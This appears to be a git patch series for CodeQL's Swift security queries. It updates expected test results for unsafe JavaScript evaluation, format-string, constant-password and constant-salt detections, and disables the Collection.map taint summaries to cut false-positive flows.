UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | -| UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:320:44:320:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:318:24:318:87 | call to String.init(contentsOf:) | UnsafeJsEval.swift:320:44:320:74 | ... .+(_:_:) ... | Evaluation of uncontrolled JavaScript from a remote source. | diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index 43a8b08c7ea..94dd27a82c2 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -18,8 +18,6 @@ edges | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | provenance | | -| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:120:26:120:26 | tainted | provenance | | -| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:124:27:124:27 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:37:135:37 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:139:5:139:5 | tainted | provenance | | @@ -30,14 +28,6 @@ edges | UncontrolledFormatString.swift:111:50:111:50 | tainted | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:112:64:112:64 | tainted | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:77:12:77:22 | format | provenance | | -| UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | UncontrolledFormatString.swift:122:24:122:24 | taintedSan | provenance | | -| UncontrolledFormatString.swift:120:26:120:26 | tainted | UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | provenance | | -| UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | provenance | | -| UncontrolledFormatString.swift:124:27:124:27 | tainted | UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | provenance | | -| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | provenance | | -| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | provenance | | -| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | provenance | | -| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | provenance | | | UncontrolledFormatString.swift:135:37:135:37 | tainted | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:139:5:139:5 | tainted | UncontrolledFormatString.swift:140:9:140:9 | cstr [Collection element] | provenance | | | UncontrolledFormatString.swift:140:9:140:9 | cstr [Collection element] | UncontrolledFormatString.swift:141:24:141:24 | cstr | provenance | | @@ -70,15 +60,6 @@ nodes | UncontrolledFormatString.swift:116:11:116:11 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:116:11:116:11 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:118:61:118:61 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| UncontrolledFormatString.swift:120:26:120:26 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:122:24:122:24 | taintedSan | semmle.label | taintedSan | -| UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| UncontrolledFormatString.swift:124:27:124:27 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | semmle.label | call to String.init(_:) [Collection element] | -| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | semmle.label | taintedVal2 | -| UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | semmle.label | taintedSan2 | | UncontrolledFormatString.swift:130:39:130:39 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | semmle.label | call to NSString.init(string:) | | UncontrolledFormatString.swift:135:37:135:37 | tainted | semmle.label | tainted | @@ -107,8 +88,6 @@ subpaths | UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:122:24:122:24 | taintedSan | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:122:24:122:24 | taintedSan | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | From 8245e6c2b971b4ab2a29fe7720d90ee82797bfd1 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 14 Nov 2024 17:51:47 +0000 Subject: [PATCH 0703/1267] Swift: Fix unwanted flows. --- .../frameworks/StandardLibrary/Collection.qll | 4 +- .../CWE-259/ConstantPassword.expected | 25 ------- .../Security/CWE-760/ConstantSalt.expected | 67 ------------------- 3 files changed, 2 insertions(+), 94 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index 2d1c83d0c81..967eeec1432 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll @@ -32,8 +32,8 @@ private class CollectionSummaries extends SummaryModelCsv { ";Collection;true;dropLast(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;flatMap(_:);;;Argument[-1];ReturnValue;taint", ";Collection;true;flatMap(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", - ";Collection;true;map(_:);;;Argument[-1];ReturnValue;taint", - ";Collection;true;map(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", + //";Collection;true;map(_:);;;Argument[-1];ReturnValue;taint", --- disabled due to dubious results in practice + //";Collection;true;map(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", --- disabled due to dubious results in practice ";Collection;true;split(maxSplits:omittingEmptySubsequences:whereSeparator:);;;Argument[-1];ReturnValue;taint", ";Collection;true;split(separator:maxSplits:omittingEmptySubsequences:);;;Argument[-1];ReturnValue;taint", ";Collection;true;removeFirst();;;Argument[-1];ReturnValue;taint", diff --git a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected index 640286de0ca..0c1e98bfe7c 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected +++ b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected @@ -1,17 +1,4 @@ edges -| rncryptor.swift:60:9:60:65 | call to String.init(_:) | rncryptor.swift:68:25:68:44 | call to getARandomPassword() | provenance | | -| rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | provenance | | -| rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:60:16:60:64 | call to map(_:) | provenance | | -| rncryptor.swift:60:16:60:64 | call to map(_:) | rncryptor.swift:60:9:60:65 | call to String.init(_:) | provenance | | -| rncryptor.swift:60:16:60:64 | call to map(_:) | rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:74:89:74:89 | myRandomPassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:75:56:75:56 | myRandomPassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:81:56:81:56 | myMaybePassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:74:89:74:89 | myRandomPassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:75:56:75:56 | myRandomPassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:81:56:81:56 | myMaybePassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | @@ -43,15 +30,7 @@ edges | test.swift:44:31:44:48 | call to getConstantArray() [Collection element] | test.swift:63:40:63:40 | constantStringPassword | provenance | | | test.swift:44:31:44:48 | call to getConstantArray() [Collection element] | test.swift:68:34:68:34 | constantStringPassword | provenance | | nodes -| rncryptor.swift:60:9:60:65 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | semmle.label | call to String.init(_:) [Collection element] | -| rncryptor.swift:60:16:60:16 | ............ | semmle.label | ............ | -| rncryptor.swift:60:16:60:64 | call to map(_:) | semmle.label | call to map(_:) | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | semmle.label | call to getARandomPassword() | -| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | semmle.label | call to getARandomPassword() [Collection element] | | rncryptor.swift:69:24:69:24 | abc123 | semmle.label | abc123 | -| rncryptor.swift:74:89:74:89 | myRandomPassword | semmle.label | myRandomPassword | -| rncryptor.swift:75:56:75:56 | myRandomPassword | semmle.label | myRandomPassword | | rncryptor.swift:77:89:77:89 | myConstPassword | semmle.label | myConstPassword | | rncryptor.swift:78:56:78:56 | myConstPassword | semmle.label | myConstPassword | | rncryptor.swift:80:89:80:89 | myMaybePassword | semmle.label | myMaybePassword | @@ -86,13 +65,9 @@ nodes | test.swift:68:34:68:34 | constantStringPassword | semmle.label | constantStringPassword | subpaths #select -| rncryptor.swift:74:89:74:89 | myRandomPassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:74:89:74:89 | myRandomPassword | The value '............' is used as a constant password. | -| rncryptor.swift:75:56:75:56 | myRandomPassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:75:56:75:56 | myRandomPassword | The value '............' is used as a constant password. | | rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | | rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:80:89:80:89 | myMaybePassword | The value '............' is used as a constant password. | | rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | -| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:81:56:81:56 | myMaybePassword | The value '............' is used as a constant password. | | rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | | rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. | | rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | diff --git a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected index 93d06372be4..002454a3021 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected +++ b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected @@ -1,28 +1,4 @@ edges -| rncryptor.swift:47:9:47:69 | call to String.init(_:) | rncryptor.swift:57:27:57:44 | call to getARandomString() | provenance | | -| rncryptor.swift:47:9:47:69 | call to String.init(_:) | rncryptor.swift:58:27:58:44 | call to getARandomString() | provenance | | -| rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:47:16:47:68 | call to map(_:) | provenance | | -| rncryptor.swift:47:16:47:68 | call to map(_:) | rncryptor.swift:47:9:47:69 | call to String.init(_:) | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:62:57:62:57 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:67:106:67:106 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:69:106:69:106 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:70:106:70:106 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:72:106:72:106 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:74:127:74:127 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:76:127:76:127 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:77:135:77:135 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:79:135:79:135 | myRandomSalt1 | provenance | | -| rncryptor.swift:57:27:57:44 | call to getARandomString() | rncryptor.swift:57:22:57:45 | call to Data.init(_:) | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:64:55:64:55 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:67:131:67:131 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:68:133:68:133 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:70:131:70:131 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:71:133:71:133 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:74:152:74:152 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:75:154:75:154 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:77:160:77:160 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:78:162:78:162 | myRandomSalt2 | provenance | | -| rncryptor.swift:58:27:58:44 | call to getARandomString() | rncryptor.swift:58:22:58:45 | call to Data.init(_:) | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:63:57:63:57 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:68:106:68:106 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:71:106:71:106 | myConstantSalt1 | provenance | | @@ -48,44 +24,19 @@ edges | test.swift:44:27:44:44 | call to getConstantArray() [Collection element] | test.swift:63:59:63:59 | constantStringSalt | provenance | | | test.swift:44:27:44:44 | call to getConstantArray() [Collection element] | test.swift:68:53:68:53 | constantStringSalt | provenance | | nodes -| rncryptor.swift:47:9:47:69 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| rncryptor.swift:47:16:47:16 | ................ | semmle.label | ................ | -| rncryptor.swift:47:16:47:68 | call to map(_:) | semmle.label | call to map(_:) | -| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | -| rncryptor.swift:57:27:57:44 | call to getARandomString() | semmle.label | call to getARandomString() | -| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | -| rncryptor.swift:58:27:58:44 | call to getARandomString() | semmle.label | call to getARandomString() | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | | rncryptor.swift:59:29:59:29 | abcdef123456 | semmle.label | abcdef123456 | | rncryptor.swift:60:24:60:30 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | | rncryptor.swift:60:29:60:29 | 0 | semmle.label | 0 | -| rncryptor.swift:62:57:62:57 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:63:57:63:57 | myConstantSalt1 | semmle.label | myConstantSalt1 | -| rncryptor.swift:64:55:64:55 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:65:55:65:55 | myConstantSalt2 | semmle.label | myConstantSalt2 | -| rncryptor.swift:67:106:67:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | -| rncryptor.swift:67:131:67:131 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:68:106:68:106 | myConstantSalt1 | semmle.label | myConstantSalt1 | -| rncryptor.swift:68:133:68:133 | myRandomSalt2 | semmle.label | myRandomSalt2 | -| rncryptor.swift:69:106:69:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:69:131:69:131 | myConstantSalt2 | semmle.label | myConstantSalt2 | -| rncryptor.swift:70:106:70:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | -| rncryptor.swift:70:131:70:131 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:71:106:71:106 | myConstantSalt1 | semmle.label | myConstantSalt1 | -| rncryptor.swift:71:133:71:133 | myRandomSalt2 | semmle.label | myRandomSalt2 | -| rncryptor.swift:72:106:72:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:72:131:72:131 | myConstantSalt2 | semmle.label | myConstantSalt2 | -| rncryptor.swift:74:127:74:127 | myRandomSalt1 | semmle.label | myRandomSalt1 | -| rncryptor.swift:74:152:74:152 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:75:127:75:127 | myConstantSalt1 | semmle.label | myConstantSalt1 | -| rncryptor.swift:75:154:75:154 | myRandomSalt2 | semmle.label | myRandomSalt2 | -| rncryptor.swift:76:127:76:127 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:76:152:76:152 | myConstantSalt2 | semmle.label | myConstantSalt2 | -| rncryptor.swift:77:135:77:135 | myRandomSalt1 | semmle.label | myRandomSalt1 | -| rncryptor.swift:77:160:77:160 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:78:135:78:135 | myConstantSalt1 | semmle.label | myConstantSalt1 | -| rncryptor.swift:78:162:78:162 | myRandomSalt2 | semmle.label | myRandomSalt2 | -| rncryptor.swift:79:135:79:135 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:79:160:79:160 | myConstantSalt2 | semmle.label | myConstantSalt2 | | test.swift:29:3:29:3 | this string is constant | semmle.label | this string is constant | | test.swift:33:2:33:34 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | @@ -103,33 +54,15 @@ nodes | test.swift:68:53:68:53 | constantStringSalt | semmle.label | constantStringSalt | subpaths #select -| rncryptor.swift:62:57:62:57 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:62:57:62:57 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:64:55:64:55 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:64:55:64:55 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:67:106:67:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:67:106:67:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:67:131:67:131 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:67:131:67:131 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:68:133:68:133 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:68:133:68:133 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | -| rncryptor.swift:69:106:69:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:69:106:69:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | 